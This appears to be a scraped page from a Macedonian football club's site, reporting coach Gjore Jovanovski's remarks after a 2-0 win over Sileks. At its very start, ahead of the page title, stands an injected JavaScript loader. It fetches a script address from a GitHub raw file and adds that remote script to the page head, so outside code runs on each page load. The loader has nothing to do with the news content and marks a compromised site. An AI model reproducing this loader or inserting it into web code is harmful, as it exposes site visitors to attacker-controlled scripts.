;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Јовановски: Триумфот над Силекс голем стимул, сега веќе мислиме на Скопје
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Јовановски: Триумфот над Силекс голем стимул, сега веќе мислиме на Скопје

Работнички оствари значајна победа против Силекс (2-0) во 26.коло, а тоа беше и деби триумф за тренерот Ѓоре Јовановски, по неговото враќање на кормилото на нашиот тим. Но, тој ги пренасочи заслугите кон фудбалерите, за кои вели дека издржале голем психолошки притисок за да стигнат до трите бода.

„Заслугите одат за фудбалерите. Сакам да им честитам затоа што издржаа голем психолошки притисок, едноставно мечот против Силекс беше како финале за нас. Но, во таков стил продолжуваме и понатаму, триумфот е голем стимул и веќе сме фокусирани на следниот натпревар против Скопје. Ќе работиме напорно, го анализиравме претходниот настап и искрено сум задоволен од пристапот кон играта и комплетното издание, но секогаш има простор за напредок и ќе се потрудиме да бидеме уште подобри на секој нареден меч“, вели шефот на стручниот штаб, Ѓоре Јовановски.